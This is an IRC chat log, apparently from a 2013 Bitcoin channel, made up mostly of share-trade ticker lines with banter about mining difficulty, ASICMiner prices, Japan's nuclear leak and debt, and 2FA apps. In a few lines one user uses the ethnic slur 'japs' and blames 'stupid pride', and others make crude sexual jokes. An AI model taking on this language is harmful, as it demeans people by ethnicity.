[BTCTC] [ACTIVEMINING] 200 @ 0.005333 = 1.0666 BTC [+] Aug 22 01:20:41 ;;nethash Aug 22 01:20:41 503089.706282 Aug 22 01:20:48 ;;estimate Aug 22 01:20:49 Next difficulty estimate | 63645798.9382 based on data since last change | 70279747.6773 based on data for last three days Aug 22 01:20:58 impressive Aug 22 01:20:59 fuck Aug 22 01:21:14 heh Aug 22 01:21:28 [BTCTC] [ASICMINER-PT] 1 @ 2.916 BTC [+] Aug 22 01:21:31 I need to sell tis single Aug 22 01:21:55 .d Aug 22 01:21:55 50810339.04828 | Next Diff in 543 blocks | Estimated Change: 25.2267% in 2d 19h 29m 58s Aug 22 01:22:07 [BTCTC] [LABCOIN] 20 @ 0.002271 = 0.0454 BTC [-] Aug 22 01:22:08 [BTCTC] [LABCOIN] 1 @ 0.00227 BTC [-] Aug 22 01:22:10 [BTCTC] [LABCOIN] 397 @ 0.00226 = 0.8972 BTC [-] Aug 22 01:22:27 aint nobody got time for dat diff Aug 22 01:22:33 The Monarch, oh the lulz Aug 22 01:22:36 hahahaha Aug 22 01:23:04 bfl = masters class in trolling Aug 22 01:23:15 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 22 01:23:40 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 22 01:24:31 [BTCTC] [ACTIVEMINING] 30 @ 0.005199 = 0.156 BTC [-] Aug 22 01:24:45 [BTCTC] [ACTIVEMINING] 30 @ 0.005199 = 0.156 BTC [-] Aug 22 01:25:20 i wonder what's next. Aug 22 01:25:20 [BTCTC] [ACTIVEMINING] 2 @ 0.0055 = 0.011 BTC [+] Aug 22 01:25:24 maybe they make The Bridge ? Aug 22 01:25:51 [BTCTC] [ACTIVEMINING] 30 @ 0.005701 = 0.171 BTC [+] Aug 22 01:25:56 ha that unocs thing? Aug 22 01:26:10 They'll make one that resembles a Voodoo 5 and runs off AGP Aug 22 01:26:13 [BTCTC] [ACTIVEMINING] 30 @ 0.005702 = 0.1711 BTC [+] Aug 22 01:26:25 [BTCTC] [ACTIVEMINING] 30 @ 0.005703 = 0.1711 BTC [+] Aug 22 01:26:25 [BTCTC] [ACTIVEMINING] 38 @ 0.005702 = 0.2167 BTC [-] Aug 22 01:26:33 [MPEX] [S.MPOE] 7600 @ 0.00082891 = 6.2997 BTC [+] Aug 22 01:26:40 next is definitely a cell phone that mines Aug 22 01:26:43 agp 2x Aug 22 01:26:44 [BTCTC] [DMS.MINING] 2 @ 0.003548 = 0.0071 BTC [-] Aug 22 01:26:45 [BTCTC] [ASICMINER-PT] 5 @ 2.919 = 14.595 BTC [+] Aug 22 01:26:46 [BTCTC] [ASICMINER-PT] 2 @ 2.92 = 5.84 BTC [+] Aug 22 01:26:59 ThickAsThieves im so dismayed they've not made a dildo that hashes. srsly. Aug 22 01:27:06 icedrill ftw. Aug 22 01:27:11 [BTCTC] [ACTIVEMINING] 30 @ 0.005229 = 0.1569 BTC [-] Aug 22 01:27:16 iceFIST Aug 22 01:27:20 [BTCTC] [ACTIVEMINING] 30 @ 0.005229 = 0.1569 BTC [-] Aug 22 01:27:21 lol Aug 22 01:27:31 The DykeDirk Aug 22 01:27:34 v1.0 beta. Aug 22 01:27:55 [BTCTC] [ACTIVEMINING] 1 @ 0.005229 BTC [-] Aug 22 01:28:04 [BTCTC] [ACTIVEMINING] 67 @ 0.005229 = 0.3503 BTC [-] Aug 22 01:28:50 [BTCTC] [ASICMINER-PT] 1 @ 2.916 BTC [-] Aug 22 01:29:21 ThickAsThieves im so dismayed they've not made a dildo that hashes. srsly. <<< you're anus will have to settle for the current offerings I guess ;) Aug 22 01:29:29 upir Aug 22 01:29:30 your Aug 22 01:29:38 man i'm retarded today Aug 22 01:29:40 i am anus Aug 22 01:29:42 [BTCTC] [TAT.ASICMINER] 67 @ 0.0307 = 2.0569 BTC [-] Aug 22 01:29:42 [BTCTC] [TAT.ASICMINER] 16 @ 0.0307 = 0.4912 BTC [-] Aug 22 01:29:48 anus Aug 22 01:30:20 lol some things can't even be said. Aug 22 01:30:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.03068 = 0.092 BTC [-] Aug 22 01:33:16 [BTCTC] [DMS.MINING] 33 @ 0.003548 = 0.1171 BTC [-] Aug 22 01:35:05 [HAVELOCK] [AM100] 2 @ 0.03001 = 0.06 BTC [-] Aug 22 01:35:07 [HAVELOCK] [AM100] 43 @ 0.03 = 1.29 BTC [-] Aug 22 01:35:10 Quote from: Inaba on Today at 05:30:12 PM : I suggest you read up on how bitcoin difficulty works as related to hashrate on the network. Whether it's 10 months or 1 month, it's completely immaterial to your ROI. The network difficulty would be far greater than it is now back in December if we had shipped everything in October and you'd have the same people complaining because they don't understand how bitcoin works. Aug 22 01:35:14 lolwat Aug 22 01:37:07 wtf Aug 22 01:37:15 [BTCTC] [TAT.ASICMINER] 7 @ 0.02877 = 0.2014 BTC [-] Aug 22 01:38:42 [BTCTC] [ASICMINER-PT] 1 @ 2.895 BTC [-] Aug 22 01:38:43 [BTCTC] [ASICMINER-PT] 1 @ 2.871 BTC [-] Aug 22 01:38:45 [BTCTC] [ASICMINER-PT] 2 @ 2.867 = 5.734 BTC [-] Aug 22 01:38:46 [BTCTC] [ASICMINER-PT] 1 @ 2.862 BTC [-] Aug 22 01:38:47 [BTCTC] [ASICMINER-PT] 2 @ 2.852 = 5.704 BTC [-] Aug 22 01:39:32 [BTCTC] [TAT.ASICMINER] 60 @ 0.02877 = 1.7262 BTC [-] Aug 22 01:39:34 [BTCTC] [TAT.ASICMINER] 27 @ 0.02876 = 0.7765 BTC [-] Aug 22 01:39:35 [BTCTC] [TAT.ASICMINER] 16 @ 0.02875 = 0.46 BTC [-] Aug 22 01:39:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.02871 = 0.1148 BTC [-] Aug 22 01:39:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.02812 = 0.0562 BTC [-] Aug 22 01:39:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.02811 = 0.2811 BTC [-] Aug 22 01:39:40 [BTCTC] [TAT.ASICMINER] 36 @ 0.02801 = 1.0084 BTC [-] Aug 22 01:39:41 [BTCTC] [TAT.ASICMINER] 9 @ 0.028 = 0.252 BTC [-] Aug 22 01:39:42 [BTCTC] [TAT.ASICMINER] 50 @ 0.028 = 1.4 BTC [-] Aug 22 01:39:44 [BTCTC] [TAT.ASICMINER] 100 @ 0.028 = 2.8 BTC [-] Aug 22 01:39:44 [BTCTC] [TAT.ASICMINER] 21 @ 0.028 = 0.588 BTC [-] Aug 22 01:39:55 [BTCTC] [LABCOIN] 30 @ 0.002289 = 0.0687 BTC [+] Aug 22 01:40:36 [BTCTC] [ASICMINER-PT] 1 @ 2.854 BTC [+] Aug 22 01:40:49 [BTCTC] [ASICMINER-PT] 1 @ 2.852 BTC [-] Aug 22 01:41:16 [BTCTC] [LABCOIN] 20 @ 0.002292 = 0.0458 BTC [+] Aug 22 01:41:28 [BTCTC] [ASICMINER-PT] 2 @ 2.852 = 5.704 BTC [-] Aug 22 01:41:51 [BTCTC] [ASICMINER-PT] 1 @ 2.851 BTC [-] Aug 22 01:42:11 [BTCTC] [ASICMINER-PT] 9 @ 2.851 = 25.659 BTC [-] Aug 22 01:42:23 [BTCTC] [LABCOIN] 1 @ 0.002322 BTC [+] Aug 22 01:42:25 [BTCTC] [LABCOIN] 20 @ 0.002323 = 0.0465 BTC [+] Aug 22 01:42:29 [BTCTC] [COGNITIVE] 1 @ 0.3163 BTC [+] Aug 22 01:42:30 [BTCTC] [COGNITIVE] 4 @ 0.3162 = 1.2648 BTC [-] Aug 22 01:42:31 [BTCTC] [COGNITIVE] 6 @ 0.312 = 1.872 BTC [-] Aug 22 01:43:01 [BTCTC] [LABCOIN] 30 @ 0.002323 = 0.0697 BTC [+] Aug 22 01:43:02 [BTCTC] [LABCOIN] 100 @ 0.002324 = 0.2324 BTC [+] Aug 22 01:43:04 [HAVELOCK] [VTX] 6 @ 0.566 = 3.396 BTC [+] Aug 22 01:43:11 [HAVELOCK] [VTX] 1 @ 0.565 BTC [-] Aug 22 01:43:17 [HAVELOCK] [VTX] 5 @ 0.56011 = 2.8006 BTC [-] Aug 22 01:43:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.02762 BTC [-] Aug 22 01:43:27 [HAVELOCK] [VTX] 3 @ 0.5601 = 1.6803 BTC [-] Aug 22 01:43:34 [HAVELOCK] [VTX] 5 @ 0.5551 = 2.7755 BTC [-] Aug 22 01:43:37 [BTCTC] [LABCOIN] 10 @ 0.002323 = 0.0232 BTC [-] Aug 22 01:46:42 [HAVELOCK] [AM100] 1 @ 0.03189 BTC [+] Aug 22 01:48:26 [BTCTC] [ACTIVEMINING] 407 @ 0.00525 = 2.1368 BTC [+] Aug 22 01:48:52 [BTCTC] [ASICMINER-PT] 1 @ 2.853 BTC [+] Aug 22 01:49:02 ugh 2.85? Aug 22 01:49:08 [BTCTC] [ASICMINER-PT] 10 @ 2.854 = 28.54 BTC [+] Aug 22 01:49:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [+] Aug 22 01:49:35 don't worry, it won't last. Aug 22 01:50:33 kakobrekla lmao Aug 22 01:51:20 I hate paypal's wait music Aug 22 01:51:29 i hate paypal Aug 22 01:51:30 It's like something out of the 70's Aug 22 01:51:33 That too Aug 22 01:52:06 how has asicminer crashed so hard? Aug 22 01:52:15 low divs panic Aug 22 01:52:25 amongst other things Aug 22 01:52:28 wasn't that low Aug 22 01:52:37 i know Aug 22 01:52:40 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001401 = 0.1401 BTC [-] Aug 22 01:52:42 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0014 BTC [-] Aug 22 01:52:43 [BTCTC] [TAT.VIRTUALMINE] 650 @ 0.001312 = 0.8528 BTC [-] Aug 22 01:52:44 [BTCTC] [TAT.VIRTUALMINE] 1141 @ 0.001311 = 1.4959 BTC [-] Aug 22 01:52:48 but lower than the past weeks Aug 22 01:52:56 [BTCTC] [ACTIVEMINING] 30 @ 0.005103 = 0.1531 BTC [-] Aug 22 01:52:57 [BTCTC] [ACTIVEMINING] 68 @ 0.005102 = 0.3469 BTC [-] Aug 22 01:52:58 [BTCTC] [ACTIVEMINING] 52 @ 0.005101 = 0.2653 BTC [-] Aug 22 01:53:06 and i guess they aren't hashing enough for people's tastes Aug 22 01:53:29 all bubbles end eventually. Aug 22 01:53:46 [BTCTC] [TAT.VIRTUALMINE] 1140 @ 0.001313 = 1.4968 BTC [+] Aug 22 01:53:47 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001301 = 0.1301 BTC [-] Aug 22 01:53:49 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0013 BTC [-] Aug 22 01:54:01 [BTCTC] [LABCOIN] 30 @ 0.002261 = 0.0678 BTC [-] Aug 22 01:54:03 [BTCTC] [LABCOIN] 470 @ 0.00226 = 1.0622 BTC [-] Aug 22 01:54:07 It'll rebubble if they start shipping new kit Aug 22 01:55:10 [BTCTC] [ASICMINER-PT] 1 @ 2.906 BTC [+] Aug 22 01:55:13 [BTCTC] [ASICMINER-PT] 1 @ 2.907 BTC [+] Aug 22 01:55:44 Nash might have something to say about that dub Aug 22 01:56:05 mining bubbles run spring to autumn Aug 22 01:56:08 sorta like lambs. Aug 22 01:56:17 fun times Aug 22 01:56:18 whats a nash Aug 22 01:56:22 [BTCTC] [DMS.MINING] 64 @ 0.003549 = 0.2271 BTC [+] Aug 22 01:56:24 [BTCTC] [DMS.MINING] 1 @ 0.003549 BTC [+] Aug 22 01:56:25 [BTCTC] [DMS.MINING] 333 @ 0.00355 = 1.1822 BTC [+] Aug 22 01:56:26 [BTCTC] [DMS.MINING] 100 @ 0.003569 = 0.3569 BTC [+] Aug 22 01:56:26 [BTCTC] [DMS.MINING] 6 @ 0.00357 = 0.0214 BTC [+] Aug 22 01:56:27 [BTCTC] [DMS.MINING] 51 @ 0.003587 = 0.1829 BTC [+] Aug 22 01:56:28 [BTCTC] [DMS.MINING] 956 @ 0.003588 = 3.4301 BTC [+] Aug 22 01:56:30 [BTCTC] [DMS.MINING] 180 @ 0.00359 = 0.6462 BTC [+] Aug 22 01:56:31 [BTCTC] [DMS.MINING] 255 @ 0.0036 = 0.918 BTC [+] Aug 22 01:56:32 [BTCTC] [DMS.MINING] 720 @ 0.003625 = 2.61 BTC [+] Aug 22 01:56:33 [BTCTC] [DMS.MINING] 1000 @ 0.003649 = 3.649 BTC [+] Aug 22 01:57:04 http://en.wikipedia.org/wiki/Nash_equilibrium Aug 22 01:58:25 you may prefer this example: http://www.youtube.com/watch?v=srgdg5tgPJk Aug 22 01:59:48 http://www.bloomberg.com/news/2013-08-21/tepco-shares-plunge-on-report-of-serious-radiated-water-leak.html#comment-1010590892 Aug 22 01:59:51 Radioactive Leaks in Japan Prompt Call for Overseas Help - Bloomberg Aug 22 01:59:57 err wrong chan, sry Aug 22 02:00:01 [HAVELOCK] [AM1] [PAID] 10.16369751 BTC to 829 shares, 1226019 satoshi per share Aug 22 02:00:03 gecko_x2 yea apparently it's pretty fucking horrid in there. Aug 22 02:00:14 i read somewhere they're leaking two-three chernobyls a month. Aug 22 02:00:27 [HAVELOCK] [AM100] [PAID] 29.20613367 BTC to 250`761 shares, 11647 satoshi per share Aug 22 02:00:40 those idiots should have called for international help from the beginning Aug 22 02:00:48 i hate the japs with their stupid pride Aug 22 02:01:32 hmmm Aug 22 02:01:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001546 BTC [+] Aug 22 02:01:53 [BTCTC] [DMS.SELLING] 50 @ 0.0172 = 0.86 BTC [-] Aug 22 02:01:53 its pretty serious that they are asking for help Aug 22 02:01:56 [BTCTC] [DMS.SELLING] 3 @ 0.0171 = 0.0513 BTC [-] Aug 22 02:01:59 [BTCTC] [DMS.SELLING] 8 @ 0.01701 = 0.1361 BTC [-] Aug 22 02:02:04 [BTCTC] [DMS.SELLING] 12 @ 0.01679 = 0.2015 BTC [-] Aug 22 02:02:07 [BTCTC] [DMS.SELLING] 10 @ 0.01678 = 0.1678 BTC [-] Aug 22 02:02:08 [BTCTC] [ASICMINER-PT] 1 @ 2.862 BTC [-] Aug 22 02:02:10 [BTCTC] [DMS.SELLING] 30 @ 0.01677 = 0.5031 BTC [-] Aug 22 02:02:11 [BTCTC] [ASICMINER-PT] 1 @ 2.862 BTC [-] Aug 22 02:02:13 [BTCTC] [DMS.SELLING] 278 @ 0.01675 = 4.6565 BTC [-] Aug 22 02:02:17 [BTCTC] [ASICMINER-PT] 2 @ 2.861 = 5.722 BTC [-] Aug 22 02:03:10 [BTCTC] [ASICMINER-PT] 2 @ 2.861 = 5.722 BTC [-] Aug 22 02:03:11 [BTCTC] [ASICMINER-PT] 1 @ 2.854 BTC [-] Aug 22 02:03:14 [BTCTC] [ASICMINER-PT] 3 @ 2.853 = 8.559 BTC [-] Aug 22 02:03:17 [BTCTC] [ASICMINER-PT] 1 @ 2.851 BTC [-] Aug 22 02:03:20 [BTCTC] [ASICMINER-PT] 3 @ 2.85 = 8.55 BTC [-] Aug 22 02:03:23 [BTCTC] [ASICMINER-PT] 1 @ 2.845 BTC [-] Aug 22 02:03:25 [BTCTC] [ASICMINER-PT] 2 @ 2.84 = 5.68 BTC [-] Aug 22 02:03:27 [HAVELOCK] [XBOND] 4 @ 0.001145 = 0.0046 BTC [+] Aug 22 02:03:30 [BTCTC] [ASICMINER-PT] 1 @ 2.835 BTC [-] Aug 22 02:03:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.02762 = 0.2762 BTC [-] Aug 22 02:03:33 [BTCTC] [ASICMINER-PT] 1 @ 2.83 BTC [-] Aug 22 02:03:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.02761 = 0.1381 BTC [-] Aug 22 02:03:34 [BTCTC] [ASICMINER-PT] 1 @ 2.825 BTC [-] Aug 22 02:03:36 [BTCTC] [ASICMINER-PT] 3 @ 2.813 = 8.439 BTC [-] Aug 22 02:03:37 [BTCTC] [ASICMINER-PT] 1 @ 2.812 BTC [-] Aug 22 02:03:49 [HAVELOCK] [AM100] 1 @ 0.03169 BTC [-] Aug 22 02:03:52 [HAVELOCK] [AM1] 1 @ 2.8 BTC [-] Aug 22 02:03:54 [HAVELOCK] [AM1] 1 @ 2.701 BTC [-] Aug 22 02:04:08 [HAVELOCK] [AM1] 1 @ 2.701 BTC [-] Aug 22 02:04:26 [HAVELOCK] [AM100] 1 @ 0.0287 BTC [-] Aug 22 02:04:29 [HAVELOCK] [AM100] 10 @ 0.0286 = 0.286 BTC [-] Aug 22 02:04:31 [HAVELOCK] [AM100] 47 @ 0.02850001 = 1.3395 BTC [-] Aug 22 02:04:32 [HAVELOCK] [AM100] 2 @ 0.0285 = 0.057 BTC [-] Aug 22 02:04:34 [HAVELOCK] [AM100] 9 @ 0.0284 = 0.2556 BTC [-] Aug 22 02:04:36 [HAVELOCK] [AM100] 1 @ 0.02807504 BTC [-] Aug 22 02:04:38 [HAVELOCK] [AM100] 10 @ 0.0276 = 0.276 BTC [-] Aug 22 02:04:40 [HAVELOCK] [AM100] 4 @ 0.0276 = 0.1104 BTC [-] Aug 22 02:04:42 [HAVELOCK] [AM100] 16 @ 0.0275 = 0.44 BTC [-] Aug 22 02:04:45 [HAVELOCK] [AM100] 4 @ 0.0275 = 0.11 BTC [-] Aug 22 02:04:47 [HAVELOCK] [AM100] 1 @ 0.027 BTC [-] Aug 22 02:05:01 [BTCTC] [BASIC-MINING] 1 @ 0.2646 BTC [-] Aug 22 02:05:03 [BTCTC] [BASIC-MINING] 2 @ 0.262 = 0.524 BTC [-] Aug 22 02:05:34 [BTCTC] [BASIC-MINING] 1 @ 0.261 BTC [-] Aug 22 02:05:36 [BTCTC] [ASICMINER-PT] 9 @ 2.81 = 25.29 BTC [-] Aug 22 02:05:39 [BTCTC] [BASIC-MINING] 1 @ 0.261 BTC [-] Aug 22 02:05:41 [BTCTC] [BASIC-MINING] 3 @ 0.26 = 0.78 BTC [-] Aug 22 02:05:42 [BTCTC] [ASICMINER-PT] 9 @ 2.81 = 25.29 BTC [-] Aug 22 02:05:44 [BTCTC] [BASIC-MINING] 1 @ 0.2504 BTC [-] Aug 22 02:05:45 [BTCTC] [ASICMINER-PT] 3 @ 2.81 = 8.43 BTC [-] Aug 22 02:05:46 [BTCTC] [BASIC-MINING] 15 @ 0.2503 = 3.7545 BTC [-] Aug 22 02:05:47 [BTCTC] [ASICMINER-PT] 1 @ 2.801 BTC [-] Aug 22 02:05:48 [BTCTC] [BASIC-MINING] 7 @ 0.2503 = 1.7521 BTC [-] Aug 22 02:05:49 [BTCTC] [ASICMINER-PT] 5 @ 2.8 = 14 BTC [-] Aug 22 02:05:50 [BTCTC] [ASICMINER-PT] 3 @ 2.8 = 8.4 BTC [-] Aug 22 02:06:12 well on the positive side, the japs are certainly going to be the first to grow wings Aug 22 02:06:21 tho it may be the case they get insect wings. Aug 22 02:07:00 [BTCTC] [ASICMINER-PT] 1 @ 3.079 BTC [+] Aug 22 02:07:05 [BTCTC] [ASICMINER-PT] 1 @ 3.08 BTC [+] Aug 22 02:07:07 they should just put tux in the sea to soak it up Aug 22 02:07:07 [BTCTC] [ASICMINER-PT] 1 @ 3.09 BTC [+] Aug 22 02:07:08 [BTCTC] [ASICMINER-PT] 1 @ 3.11 BTC [+] Aug 22 02:07:53 i can't wait for the japanese bond markets and currency to collapse Aug 22 02:08:30 it won't collapse. Aug 22 02:08:42 no? Aug 22 02:09:03 they are using like 50% of current tax revenue just to pay off previous interest on debt Aug 22 02:09:13 they aretrying to double the money supply in 2 years Aug 22 02:09:17 it's gonna collapse. Aug 22 02:09:23 [HAVELOCK] [XBOND] 22 @ 0.00106501 = 0.0234 BTC [-] Aug 22 02:09:26 [HAVELOCK] [XBOND] 2342 @ 0.001065 = 2.4942 BTC [-] Aug 22 02:09:40 [HAVELOCK] [AM100] 19 @ 0.02651 = 0.5037 BTC [-] Aug 22 02:09:42 JPY already cheap per unit. I'll be a JPY billionaire Aug 22 02:09:43 [HAVELOCK] [AM100] 1 @ 0.0299 BTC [+] Aug 22 02:09:54 gecko_x2 they're a nation. they'll be fine. Aug 22 02:10:06 things that collapse are conglomerates, like ussr or usa. Aug 22 02:10:22 countries get kicked in the teeth two-three times a century and come right back for more. Aug 22 02:10:32 i specifically said the bond markets and currency Aug 22 02:10:38 i didn't say anything about the nation Aug 22 02:11:33 [BTCTC] [ACTIVEMINING] 430 @ 0.00515 = 2.2145 BTC [+] Aug 22 02:12:00 i agree that they will rise again, just that they should just let it go already, the sooner the better Aug 22 02:12:12 [BTCTC] [ACTIVEMINING] 700 @ 0.00515 = 3.605 BTC [+] Aug 22 02:12:17 [BTCTC] [TAT.ASICMINER] 9 @ 0.0265 = 0.2385 BTC [-] Aug 22 02:13:27 well now like that you prolly have a point Aug 22 02:14:32 it's that stupid pride that always gets them in trouble Aug 22 02:15:15 [BTCTC] [TAT.ASICMINER] 67 @ 0.02694 = 1.805 BTC [+] Aug 22 02:15:19 [BTCTC] [TAT.ASICMINER] 43 @ 0.02694 = 1.1584 BTC [+] Aug 22 02:15:30 azn weird. Aug 22 02:15:50 [BTCTC] [TAT.ASICMINER] 10 @ 0.02693 = 0.2693 BTC [-] Aug 22 02:15:54 [BTCTC] [TAT.ASICMINER] 57 @ 0.02693 = 1.535 BTC [-] Aug 22 02:15:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.02694 = 0.1886 BTC [+] Aug 22 02:15:57 [BTCTC] [TAT.ASICMINER] 13 @ 0.02695 = 0.3504 BTC [+] Aug 22 02:15:59 [BTCTC] [TAT.ASICMINER] 5 @ 0.02699 = 0.135 BTC [+] Aug 22 02:16:00 [BTCTC] [TAT.ASICMINER] 25 @ 0.027 = 0.675 BTC [+] Aug 22 02:16:38 [HAVELOCK] [XBOND] 7 @ 0.00114449 = 0.008 BTC [+] Aug 22 02:16:51 [BTCTC] [ASICMINER-PT] 1 @ 2.861 BTC [-] Aug 22 02:16:54 [BTCTC] [ASICMINER-PT] 1 @ 2.86 BTC [-] Aug 22 02:17:11 To contact the reporters on this story: Jacob Adelman in Tokyo at jadelman1@bloomberg.net; Yuji Okada in Tokyo at yokada6@bloomberg.net; Peter Langan in Tokyo at plangan@bloomberg.net Aug 22 02:17:11 To contact the editor responsible for this story: Jason Rogers at jrogers73@bloomberg.net Aug 22 02:17:28 pretty funny shit. they have 73 jrogers, 6 yokadas but just one plangans Aug 22 02:17:48 cool I'll contact him np Aug 22 02:18:20 why should we contact him tho? Aug 22 02:18:20 [HAVELOCK] [XBOND] 4 @ 0.00106001 = 0.0042 BTC [-] Aug 22 02:18:22 [HAVELOCK] [XBOND] 7 @ 0.00106001 = 0.0074 BTC [-] Aug 22 02:18:25 [HAVELOCK] [AM100] 20 @ 0.028 = 0.56 BTC [-] Aug 22 02:18:30 [MPEX] [S.MG] 10000 @ 0.000235 = 2.35 BTC [-] Aug 22 02:18:45 [HAVELOCK] [XBOND] 15 @ 0.00106 = 0.0159 BTC [-] Aug 22 02:18:53 [BTCTC] [ASICMINER-PT] 1 @ 2.822 BTC [-] Aug 22 02:18:56 [BTCTC] [ASICMINER-PT] 6 @ 2.811 = 16.866 BTC [-] Aug 22 02:19:18 [HAVELOCK] [XBOND] 23 @ 0.00106 = 0.0244 BTC [-] Aug 22 02:19:30 [BTCTC] [LABCOIN] 20 @ 0.002308 = 0.0462 BTC [+] Aug 22 02:19:33 [HAVELOCK] [AM100] 1 @ 0.02799 BTC [-] Aug 22 02:19:49 [BTCTC] [ASICMINER-PT] 1 @ 2.79 BTC [-] Aug 22 02:19:58 btw, there's one thing that BTCT or any other exchange dealing with 2FA with Google Authenticator forgot - people who don't have Google Play on their phones. Aug 22 02:20:03 [HAVELOCK] [XBOND] 26 @ 0.001054 = 0.0274 BTC [-] Aug 22 02:20:06 [HAVELOCK] [AM100] 7 @ 0.02799 = 0.1959 BTC [-] Aug 22 02:20:20 [HAVELOCK] [AM100] 1 @ 0.02799 BTC [-] Aug 22 02:20:26 [BTCTC] [ASICMINER-PT] 1 @ 2.788 BTC [-] Aug 22 02:20:28 thats some incomplete thinking Aug 22 02:20:34 on your own part Aug 22 02:20:43 how is that? Aug 22 02:20:53 google play is not required Aug 22 02:20:57 to use 2fa Aug 22 02:21:10 [BTCTC] [ASICMINER-PT] 1 @ 2.76 BTC [-] Aug 22 02:21:22 [HAVELOCK] [XBOND] 15 @ 0.00114449 = 0.0172 BTC [+] Aug 22 02:21:24 [HAVELOCK] [XBOND] 5 @ 0.00114449 = 0.0057 BTC [+] Aug 22 02:21:28 but the only safe alternative is to buy a Yubikey (= spending moneys) Aug 22 02:21:33 or use Authy Aug 22 02:21:43 or surely other ways Aug 22 02:22:02 [HAVELOCK] [AM100] 1 @ 0.0275 BTC [-] Aug 22 02:22:10 oh, I haven't heard of that. Google Authenticator can only be downloaded from Play Aug 22 02:22:15 [HAVELOCK] [AM100] 4 @ 0.0275 = 0.11 BTC [-] Aug 22 02:22:35 [BTCTC] [ASICMINER-PT] 1 @ 2.74 BTC [-] Aug 22 02:22:47 [BTCTC] [ASICMINER-PT] 1 @ 2.734 BTC [-] Aug 22 02:22:49 [HAVELOCK] [AM100] 1 @ 0.02799 BTC [+] Aug 22 02:22:59 surely the package is out there somewhere too ,no? Aug 22 02:23:12 .d Aug 22 02:23:12 50810339.04828 | Next Diff in 533 blocks | Estimated Change: 25.3707% in 2d 18h 12m 29s Aug 22 02:23:17 [HAVELOCK] [AM100] 20 @ 0.028 = 0.56 BTC [+] Aug 22 02:23:25 [HAVELOCK] [XBOND] 6 @ 0.00114449 = 0.0069 BTC [+] Aug 22 02:24:37 [HAVELOCK] [AM100] 12 @ 0.0275 = 0.33 BTC [-] Aug 22 02:24:50 but then you're relying on 3rd parties to handle your 2FA. Google Auth download was purposely removed from its project page by Google. Aug 22 02:25:32 [HAVELOCK] [XBOND] 12 @ 0.0011445 = 0.0137 BTC [+] Aug 22 02:26:19 it's also not the exchange's problem if you buy a phone not capable of providing 2fa Aug 22 02:27:49 [BTCTC] [ACTIVEMINING] 1 @ 0.00521 BTC [+] Aug 22 02:27:51 [BTCTC] [ACTIVEMINING] 2 @ 0.005269 = 0.0105 BTC [+] Aug 22 02:27:54 [BTCTC] [ACTIVEMINING] 30 @ 0.00527 = 0.1581 BTC [+] Aug 22 02:27:56 [BTCTC] [ACTIVEMINING] 50 @ 0.005299 = 0.265 BTC [+] Aug 22 02:28:01 [BTCTC] [ACTIVEMINING] 30 @ 0.005299 = 0.159 BTC [+] Aug 22 02:28:09 [BTCTC] [ACTIVEMINING] 68 @ 0.005299 = 0.3603 BTC [+] Aug 22 02:28:32 [HAVELOCK] [XBOND] 10 @ 0.001055 = 0.0106 BTC [-] Aug 22 02:28:39 [HAVELOCK] [XBOND] 1 @ 0.001055 BTC [-] Aug 22 02:28:42 [HAVELOCK] [AM100] 28 @ 0.02750001 = 0.77 BTC [+] Aug 22 02:28:43 I guess you could say that, but it's in the same league as being required to use a Windows OS to fill in your tax forms and / or use other online municipal facilities. Aug 22 02:28:46 [HAVELOCK] [AM100] 3 @ 0.02750001 = 0.0825 BTC [+] Aug 22 02:28:50 [BTCTC] [ACTIVEMINING] 300 @ 0.0053 = 1.59 BTC [+] Aug 22 02:29:04 you need windows to do taxes? Aug 22 02:29:16 i think you suffer from some paradigm issues Aug 22 02:29:26 in lots of countries it's a cold hard reality Aug 22 02:29:36 [BTCTC] [ACTIVEMINING] 55 @ 0.005299 = 0.2914 BTC [-] Aug 22 02:29:37 [BTCTC] [ACTIVEMINING] 700 @ 0.0053 = 3.71 BTC [+] Aug 22 02:29:42 [HAVELOCK] [AM100] 4 @ 0.02750001 = 0.11 BTC [+] Aug 22 02:29:54 it was in fact like this for many years in the Netherlands IIRC. Aug 22 02:30:08 [BTCTC] [BASIC-MINING] 20 @ 0.2502 = 5.004 BTC [-] Aug 22 02:30:18 [HAVELOCK] [XBOND] 25 @ 0.001055 = 0.0264 BTC [-] Aug 22 02:30:23 no paper forms there? Aug 22 02:30:24 [BTCTC] [HOSTED-MINING] 1 @ 0.2798 BTC [+] Aug 22 02:30:40 [BTCTC] [ASICMINER-PT] 1 @ 2.735 BTC [+] Aug 22 02:31:30 so that means to waste paper for something which can be trivially done without them? Aug 22 02:31:44 [HAVELOCK] [XBOND] 3 @ 0.001055 = 0.0032 BTC [-] Aug 22 02:32:09 [BTCTC] [ACTIVEMINING] 30 @ 0.005421 = 0.1626 BTC [+] Aug 22 02:32:11 [BTCTC] [BASIC-MINING] 10 @ 0.2502 = 2.502 BTC [-] Aug 22 02:32:14 [BTCTC] [ASICMINER-PT] 2 @ 2.733 = 5.466 BTC [-] Aug 22 02:32:17 [BTCTC] [ASICMINER-PT] 1 @ 2.733 BTC [-] Aug 22 02:32:19 [BTCTC] [ASICMINER-PT] 1 @ 2.733 BTC [-] Aug 22 02:32:38 [BTCTC] [ACTIVEMINING] 30 @ 0.005421 = 0.1626 BTC [+] Aug 22 02:33:05 [BTCTC] [ASICMINER-PT] 2 @ 2.73 = 5.46 BTC [-] Aug 22 02:33:06 [BTCTC] [ACTIVEMINING] 15 @ 0.005421 = 0.0813 BTC [+] Aug 22 02:33:10 [BTCTC] [ASICMINER-PT] 10 @ 2.73 = 27.3 BTC [-] Aug 22 02:33:56 [BTCTC] [ASICMINER-PT] 2 @ 2.74 = 5.48 BTC [+] Aug 22 02:34:02 [BTCTC] [ACTIVEMINING] 30 @ 0.005229 = 0.1569 BTC [-] Aug 22 02:34:23 [BTCTC] [ACTIVEMINING] 30 @ 